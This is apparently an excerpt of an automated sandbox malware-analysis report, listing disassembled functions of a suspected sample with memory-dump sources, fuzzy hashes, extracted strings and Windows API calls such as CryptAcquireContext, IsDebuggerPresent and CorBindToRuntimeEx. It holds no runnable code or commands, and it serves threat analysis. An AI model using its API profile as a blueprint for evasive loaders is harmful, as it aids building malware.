                                                                                          • Instruction Fuzzy Hash: 0901D2B0D0020E9FCB50EFA8E5446AEBBB4BF49304F5081A9D819A3344EB301A41CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2729279c08ea36b2bd97c62ae0f9bc173f0855d6e6e82ba9f5a9a29255ace750
                                                                                          • Instruction ID: a2e91c400e7af5c69f95d22321848a239de786bb4e20f960f1eb7e823acd7eb8
                                                                                          • Opcode Fuzzy Hash: 2729279c08ea36b2bd97c62ae0f9bc173f0855d6e6e82ba9f5a9a29255ace750
                                                                                          • Instruction Fuzzy Hash: A1E0E574D04308EFCB64DFA8E444A9DBFB5FB48310F00C1AAA81493310D7305A50EF81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 56ed25f0967e584bf768718af4d0a697a7e8ad0b4776d5e9df7e3b63c75a7fc3
                                                                                          • Instruction ID: 2d20dd1ba7f60e018784f6c058d3e4ee3533e20635e23d03773f6973dacff07d
                                                                                          • Opcode Fuzzy Hash: 56ed25f0967e584bf768718af4d0a697a7e8ad0b4776d5e9df7e3b63c75a7fc3
                                                                                          • Instruction Fuzzy Hash: 68D0123198E209DBD7159FA4A4449FEFBBCAF8A315F00A19C940933651DA301E55DA89
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e594020c98ba07e1bf25245d57894857f78d06dbfbcd850185054e66ddd780b2
                                                                                          • Instruction ID: 94c5e593ccf505d8a579fbe0c03c57749c008bb1021c089838d88f21b62610c9
                                                                                          • Opcode Fuzzy Hash: e594020c98ba07e1bf25245d57894857f78d06dbfbcd850185054e66ddd780b2
                                                                                          • Instruction Fuzzy Hash: C5E0EC70D4530A8ACB51EFB9A4057AEBBB89B09214F04A165D54893246E63101458FD6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dbd13d579492b27d1e2372c8d9e2d6988da0d8843093f4ea81f41d45ee896ccd
                                                                                          • Instruction ID: 971087dbf56af794967e0a919bf608b72f91ff1e797215f1a2fedb5b478e7135
                                                                                          • Opcode Fuzzy Hash: dbd13d579492b27d1e2372c8d9e2d6988da0d8843093f4ea81f41d45ee896ccd
                                                                                          • Instruction Fuzzy Hash: 05D0C9711493895ECF369BA4A8183D97F746B03399F0AA1A7E04885496CBB0014AE751
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d5dcdb7f9d90d901e08bd3d7438507fbc7d37099a0c81e151eaa63007fda71c3
                                                                                          • Instruction ID: 9584f55471d3f467b946bac83e5fd88ceb6218ee9ef42882772bd0aa1239b2ac
                                                                                          • Opcode Fuzzy Hash: d5dcdb7f9d90d901e08bd3d7438507fbc7d37099a0c81e151eaa63007fda71c3
                                                                                          • Instruction Fuzzy Hash: 30D022A21D034983E12223E8B0083AFBE6C0B8B328F009811A048424405BA0100093AE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a969cb2f9f193a11f7d49211a8c1ab0c7c623b7eda1953bf8e68cdac006a0b9c
                                                                                          • Instruction ID: 8808148667c6cd54ed25cb498a734680b2f4e630a8917364281ff5b6833f40ec
                                                                                          • Opcode Fuzzy Hash: a969cb2f9f193a11f7d49211a8c1ab0c7c623b7eda1953bf8e68cdac006a0b9c
                                                                                          • Instruction Fuzzy Hash: ECD0C93024020C9FDF255AB1EA09B577B9CDB00359F00D82AF80986650DB32D4548650
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87b02d907ba821f6376591ea6bcd815595675b4d95f0393bab5c5c3764f7ecce
                                                                                          • Instruction ID: f181a0b7e52ca1e716825278252cba4b7d314ba411b85765508e2c0387b0a97f
                                                                                          • Opcode Fuzzy Hash: 87b02d907ba821f6376591ea6bcd815595675b4d95f0393bab5c5c3764f7ecce
                                                                                          • Instruction Fuzzy Hash: 74C02B300C570587C27133F8F0083AF7A9C5F45319F40A010F10C024104FB02040C7F6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0dee4ba1149c54dc87b7e3028bccc1fa83b0733d74a97e156ac52d5cb6046eb3
                                                                                          • Instruction ID: 6a2fadf9c86c6c7bde5fae63f91856e73febfeb8a255fc467d67d2058411b791
                                                                                          • Opcode Fuzzy Hash: 0dee4ba1149c54dc87b7e3028bccc1fa83b0733d74a97e156ac52d5cb6046eb3
                                                                                          • Instruction Fuzzy Hash: 76B0923008570A8BDE35ABD8B8087BEBBAC6B4532EF88A114A54C018949FB06150D7E6
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022DFF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022E08
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D022E7E
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D022EB5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022EC1
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                            • Part of subcall function 6D02C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                            • Part of subcall function 6D02C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                            • Part of subcall function 6D02C850: VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0230D5
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D023550
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023563
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2012514194-0
                                                                                          • Opcode ID: 8837b812cbcf8373d0fd90d95654755163ed0aaaba194f8163a2e6e45a5540cb
                                                                                          • Instruction ID: 0976313675be836129c5f30aa0c30040f465dfb83c94403fc4abc1ab0b906f33
                                                                                          • Opcode Fuzzy Hash: 8837b812cbcf8373d0fd90d95654755163ed0aaaba194f8163a2e6e45a5540cb
                                                                                          • Instruction Fuzzy Hash: 63526B71905219DFEB14DFA8C884BEEBBF6BF89300F158199E909AB351D730A945CF90
                                                                                          APIs
                                                                                          • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6D090634,6D090738,?), ref: 6D01A119
                                                                                          • GetModuleHandleW.KERNEL32(mscorwks), ref: 6D01A145
                                                                                          • __cftoe.LIBCMT ref: 6D01A1FB
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6D01A215
                                                                                          • GetProcAddress.KERNEL32(00000000,00000018), ref: 6D01A265
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                                                          • String ID: mscorwks$v2.0.50727$wks
                                                                                          • API String ID: 1312202379-2066655427
                                                                                          • Opcode ID: 64a64552890502e30d0411f34a6cc1e28c4497091908993f1bc01d51c9af9705
                                                                                          • Instruction ID: 132637c928f814d451af7477a01d366f8eec43534d1a1724b561094dc3c80e7f
                                                                                          • Opcode Fuzzy Hash: 64a64552890502e30d0411f34a6cc1e28c4497091908993f1bc01d51c9af9705
                                                                                          • Instruction Fuzzy Hash: 6A916E71D082499FEB04DFE9D980AAEBBF5BF49310F20826DE519EB341D730994ACB54
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,4E8A916F,6D088180,00000000,?), ref: 6D05DBFB
                                                                                          • GetLastError.KERNEL32 ref: 6D05DC01
                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6D05DC15
                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6D05DC26
                                                                                          • SetLastError.KERNEL32(00000000), ref: 6D05DC2D
                                                                                            • Part of subcall function 6D05D9D0: GetLastError.KERNEL32(00000010,4E8A916F,75A8FC30,?,00000000), ref: 6D05DA1A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D05DC78
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                                                                          • API String ID: 3279666080-1159690233
                                                                                          • Opcode ID: 4fb440c83a28b4405ecb25be71f301f10313e1484008fe327365395004adc84c
                                                                                          • Instruction ID: 68aead561c4a7979a8f95c695b474a851493052fd57da4f78f00d3f33ab58b14
                                                                                          • Opcode Fuzzy Hash: 4fb440c83a28b4405ecb25be71f301f10313e1484008fe327365395004adc84c
                                                                                          • Instruction Fuzzy Hash: 0421CF7124C341ABF710EB24CC45F6BBBE8EB8A745F00091EF641972C1EBB5E0048BA6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                          • API String ID: 0-1027864050
                                                                                          • Opcode ID: 057a7a92724360c60a85edebb2c2d4c9466e9613ceead53997455433d1e36cf0
                                                                                          • Instruction ID: 4de691cabbf46ce855a253f5615dd07919b0e92ada2b753ad752f3f6f7e7a2b7
                                                                                          • Opcode Fuzzy Hash: 057a7a92724360c60a85edebb2c2d4c9466e9613ceead53997455433d1e36cf0
                                                                                          • Instruction Fuzzy Hash: BF22B131B402158FCB1ADF69D8946EF7BB2AF89704B15D469E406EB761CB30DC41CB91
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6D06CE6C
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D06CE81
                                                                                          • UnhandledExceptionFilter.KERNEL32(6D089428), ref: 6D06CE8C
                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6D06CEA8
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6D06CEAF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 2579439406-0
                                                                                          • Opcode ID: 5662b6d88abf9adb68f9f07f8ac4bdc3f97aea7fd5a8e3ad757e9b5b9cca6634
                                                                                          • Instruction ID: 80a48f6f3fe7d7605695a7ccddffbba2ba00b12322335fd4b4849491ea4649a4
                                                                                          • Opcode Fuzzy Hash: 5662b6d88abf9adb68f9f07f8ac4bdc3f97aea7fd5a8e3ad757e9b5b9cca6634
                                                                                          • Instruction Fuzzy Hash: 782100B5908A48DFDF50DF58D0A478D3BB4FB2B315F18411AE50987B42E7B08980CF59
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0624A1
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D06248C
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 757275642-0
                                                                                          • Opcode ID: c0e190617163c3dd19e7d7bde7217b61051af7dff460e1047e7e8212624e0ce5
                                                                                          • Instruction ID: d82abc6074d4eae6988c0d2b97a2faeaf3719aa7a3b45c19ea6e6c576adb42d7
                                                                                          • Opcode Fuzzy Hash: c0e190617163c3dd19e7d7bde7217b61051af7dff460e1047e7e8212624e0ce5
                                                                                          • Instruction Fuzzy Hash: 08326071A056469FEB24CFA8C890BAEB7F6FF89744B14412DE506DB254E730E901CBB1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 313dfbb147e5f45f41dab0490e768de3bc991367dd32f81ddf0586a4f97419d6
                                                                                          • Instruction ID: ce49f7851eebd749eda3b32df7edddc2e89d16af2da038dddf2df7e42e2ee6d1
                                                                                          • Opcode Fuzzy Hash: 313dfbb147e5f45f41dab0490e768de3bc991367dd32f81ddf0586a4f97419d6
                                                                                          • Instruction Fuzzy Hash: D502AE704187A88FC744CF69C4B4A7EBBF1EBDA211F45090EE6F657292C334A568CB61
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: b682528a1a356f307816c10e90a5f4c8191f4f4e1c8c512b4258ca3bb685452a
                                                                                          • Instruction ID: de51b802f36edc08d18ec08f56bd812aee9787ba761a87eafb94c84d029917a4
                                                                                          • Opcode Fuzzy Hash: b682528a1a356f307816c10e90a5f4c8191f4f4e1c8c512b4258ca3bb685452a
                                                                                          • Instruction Fuzzy Hash: 0BE1B0704187A88FC744CB69D8B4A7E7BF1EBDA211F49050EE6F5472A2D334A16CDB21
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$LOOK$Gvq$Gvq
                                                                                          • API String ID: 0-802966049
                                                                                          • Opcode ID: 5da0c9cbf5c37495b3c826ea4ef293e657dbee9cc00221debb36c823e1270f60
                                                                                          • Instruction ID: e905a2031ec4e25bcb6d6dd1b8e7b7a7d35d65c3e92086d25b04b5bb661083b9
                                                                                          • Opcode Fuzzy Hash: 5da0c9cbf5c37495b3c826ea4ef293e657dbee9cc00221debb36c823e1270f60
                                                                                          • Instruction Fuzzy Hash: 3EF1A074E452298FDB64DF69C988BDDBBF6BB48310F1486EAD409A7351DB309E808F50
                                                                                          APIs
                                                                                          • CryptGenRandom.ADVAPI32(?,?,?,4E8A916F,00000000), ref: 6D05DE6F
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D05DEB9
                                                                                            • Part of subcall function 6D05DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D07F0E6,000000FF,6D05DF67,00000000,?), ref: 6D05DDB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                          • String ID: CryptGenRandom
                                                                                          • API String ID: 1047471967-3616286655
                                                                                          • Opcode ID: 0032278fb9318706af4ee3a85ed1815548db217c35f71a2afd16c45695f0bd83
                                                                                          • Instruction ID: 64c8bbaf80c00c5b91ca6e0d7723e086e15e266aa72a0e8ecebaf47e5668e686
                                                                                          • Opcode Fuzzy Hash: 0032278fb9318706af4ee3a85ed1815548db217c35f71a2afd16c45695f0bd83
                                                                                          • Instruction Fuzzy Hash: E821387550C7849FE700DF28C554B5ABBF9FB89718F044A0EF85587281E774E504CBA2
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: d93d99bc1987f8eeaab4533189e5957cd0032092d7a21398ce956abb3b13e109
                                                                                          • Instruction ID: c77111834550c14e902e420e4be8bc5cbdff1912c7f8e6d2e370a93f0bdbe04f
                                                                                          • Opcode Fuzzy Hash: d93d99bc1987f8eeaab4533189e5957cd0032092d7a21398ce956abb3b13e109
                                                                                          • Instruction Fuzzy Hash: 225202709046658FDB14CF29C0A067ABBF2EFCA311B58859DD8D68B386D334F556CBA0
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000010,4E8A916F,75A8FC30,?,00000000), ref: 6D05DA1A
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastXinvalid_argumentstd::_
                                                                                          • String ID: operation failed with error $OS_Rng:
                                                                                          • API String ID: 406877150-700108173
                                                                                          • Opcode ID: 0c89c0f62346d20a1ccac85d37f75faf5fd4223901853b31d1e2262bd4db99ca
                                                                                          • Instruction ID: 9277f273219cbe38688ac8983514bcd65731878c615a6f7944449c4e685576fd
                                                                                          • Opcode Fuzzy Hash: 0c89c0f62346d20a1ccac85d37f75faf5fd4223901853b31d1e2262bd4db99ca
                                                                                          • Instruction Fuzzy Hash: 4D419DB150C380AFE720CF69D840B5BFBE9BF99654F11492EE18987241DB759404CB67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Hbq$$^q$$^q
                                                                                          • API String ID: 0-1611274095
                                                                                          • Opcode ID: c60b7fa8507da389638fd77c031dc569c7cff7c2b57fcd85a9ce9f85bcce069f
                                                                                          • Instruction ID: 203261d03e406eb818bf263acb1e3a3864777c81b301bd14c15080d833a5c53d
                                                                                          • Opcode Fuzzy Hash: c60b7fa8507da389638fd77c031dc569c7cff7c2b57fcd85a9ce9f85bcce069f
                                                                                          • Instruction Fuzzy Hash: CC027070F041198BCB18DFA9D4956EEBBF7BF89700F24956AD416AB360DF349802CB91
                                                                                          APIs
                                                                                          • std::exception::exception.LIBCMT ref: 6D061E1D
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D061E32
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 757275642-0
                                                                                          • Opcode ID: 900012ff7bfa26aae8367a215ebe62165a417b690c1a80d13971c99106d3638f
                                                                                          • Instruction ID: cab9303e3d25ec35beb2ae31c15932f0363a8ee29092244e1529eacdfb82191f
                                                                                          • Opcode Fuzzy Hash: 900012ff7bfa26aae8367a215ebe62165a417b690c1a80d13971c99106d3638f
                                                                                          • Instruction Fuzzy Hash: 3D327471E046469FEB18CFA8C890BAEB7F6BF89744B15811DE515DB350EB30E901CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3519545e4d37b1634e4cc69c6eca3e226d71d66ad24bfafd5cdd57da684819ee
                                                                                          • Instruction ID: e5a495549ababff1bdd40ed144e01f1eb0b87d1cc3eecd3c63e264589de63ac1
                                                                                          • Opcode Fuzzy Hash: 3519545e4d37b1634e4cc69c6eca3e226d71d66ad24bfafd5cdd57da684819ee
                                                                                          • Instruction Fuzzy Hash: D2320521D29F424DEB239634C83233662ADAFB73D5F15D727F829BAD95EB29C4834101
                                                                                          APIs
                                                                                            • Part of subcall function 6D004760: __CxxThrowException@8.LIBCMT ref: 6D0047F9
                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?), ref: 6D05DF7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextCryptException@8ReleaseThrow
                                                                                          • String ID:
